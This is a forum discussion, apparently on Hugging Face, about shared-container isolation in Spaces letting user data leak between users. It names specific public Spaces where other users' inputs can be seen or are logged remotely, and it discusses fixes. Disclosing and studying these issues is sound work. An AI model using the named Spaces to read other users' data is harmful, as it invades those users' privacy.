While exploring Spaces, I discovered that they operate in a containerized environment that is designed around per-app isolation rather than per-user isolation. This raises concerns about potential security risks, specifically data leakage between users.
Consider this example: I have a Space (Shell - a Hugging Face Space by juppytt) that runs shell commands based on user input. If one user writes a file using the command
echo "secret" > testfile, this app lets another user read that same file using
cat testfile, reading what the previous user wrote.
From public Spaces, I found several repositories that might permit the leakage of user data. Here are some examples:
https://huggingface.co/spaces/awacke1/CB-GR-Chatbot-Blenderbot : Clicking the ‘Respond and Retrieve Messages’ button reveals the input of other users.
https://huggingface.co/spaces/awacke1/GradioAutoCSVLoaderToPlotly : The graph displayed on the right side contains a record of previous user inputs.
Moreover, it’s not just inter-user data leakage that is of concern. Certain Spaces themselves pose a risk of exposing user data to arbitrary.
https://huggingface.co/spaces/jeevavijay10/nlp-goemotions-senti-pred : Every time a user submits data, the user input gets logged and then transmitted to a remote database repository (
https://huggingface.co/spaces/productizationlabs/ContactForm : This Space collects user contact information and stores it in memory. While this application only stores sensitive data, it’s worth noting that there exists a possibility for such an application to transmit this data over a remote network.
With these potential security risks, are there discussions or plans going on to improve security in Spaces and ensure user data stays private? Would love to hear your thoughts!
Thanks for the extensive valuable feedback.
We appreciate your feedback and are open to ideas on how to empower new users in this context to make apps more secure.
Also, our Hub offers a webhooks feature (Webhooks). If you’re interested, you could explore ideas of bots or scanners to notify app owners about potential vulnerabilities.
We are facing two problems here:
- User input can be leaked or exposed to other users.
- User input can be secretly logged and transferred to the app developer or other parties.
The first problem can be easily solved by creating a new container for each user request. However, this may incur additional performance overhead. Also, there are some Spaces that rely on users sharing a single container, particularly when implementing user-participated leaderboards. If compatibility with such Spaces has to be considered, there should be limited ways of sharing user data across users.
Regarding the second problem, preventing all forms of data leakage is currently extremely challenging since Spaces accept any kind of code. While it’s difficult to achieve complete prevention, bots or scanners can analyze the code and monitor the runtime behavior of Spaces to detect unsafe data flows. This can help mitigate the risks, although it’s important to acknowledge that there is still a possibility of bypass or false alerts. It’s likely that a reasonable solution to this issue will emerge in the future, for example, data flow tracking.
As an open web-application platform like Hugging Face, it’s crucial to provide a systemic solution that clearly defines how user data is used. Many Spaces currently operate based on user credentials such as API keys, user names, passwords, and input prompts. However, it is quite unclear how they are used and the system by its nature contains the risk of data breaches through malicious or vulnerable Spaces.